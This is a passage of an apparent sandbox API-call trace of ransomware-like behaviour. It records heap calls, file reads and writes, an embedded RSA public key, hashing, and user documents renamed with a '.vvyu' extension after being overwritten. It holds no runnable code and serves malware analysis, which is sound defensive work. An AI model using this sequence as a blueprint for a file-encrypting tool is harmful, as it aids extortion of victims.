[0196.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2eb8 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ea0 | out: hHeap=0x620000) returned 1 [0196.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1920 | out: hHeap=0x620000) returned 1 [0196.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.605] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x1332a, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x1332a, lpOverlapped=0x0) returned 1 [0196.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.607] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1332f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.607] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.608] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.609] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.609] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.609] CloseHandle (hObject=0x568) returned 1 [0196.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0196.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0196.611] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\YnkbYRnkC6J3AvV0Zier.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ynkbyrnkc6j3avv0zier.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\YnkbYRnkC6J3AvV0Zier.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ynkbyrnkc6j3avv0zier.odt.vvyu")) returned 1 [0196.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.613] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.616] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d8c9850, ftCreationTime.dwHighDateTime=0x1d8a07d, ftLastAccessTime.dwLowDateTime=0x243aa730, ftLastAccessTime.dwHighDateTime=0x1d8a6fd, ftLastWriteTime.dwLowDateTime=0x243aa730, ftLastWriteTime.dwHighDateTime=0x1d8a6fd, nFileSizeHigh=0x0, nFileSizeLow=0x75ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yTkydbos.xlsx", cAlternateFileName="YTKYDB~1.XLS")) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0196.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.616] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\yTkydbos.xlsx") returned=".xlsx" [0196.616] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\yTkydbos.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\ytkydbos.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0196.617] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=30189) returned 1 [0196.617] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0196.620] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x75c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.620] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.623] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.623] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x75ed, lpOverlapped=0x0) returned 1 [0196.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0196.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.624] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.624] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0196.625] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0196.625] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.625] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0196.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0196.625] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0196.625] GetLastError () returned 0x0 [0196.625] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0196.625] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0196.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.626] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0196.626] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0196.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.626] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0196.626] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0196.626] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x75f0) returned 0x2ea79b0 [0196.626] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0196.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1920 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ea0 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1968 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2eb8 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0196.627] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0196.627] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0196.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.627] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0196.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ee8 [0196.628] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0196.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.629] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.630] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0196.630] GetCurrentThreadId () returned 0x66c [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea55c0 [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0196.630] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.631] GetCurrentThreadId () returned 0x66c [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.631] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0196.631] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0196.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0196.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccad98 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0196.632] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.632] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ee8 [0196.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0196.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ed0 [0196.633] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0196.633] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f18 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ee8 [0196.634] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.634] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 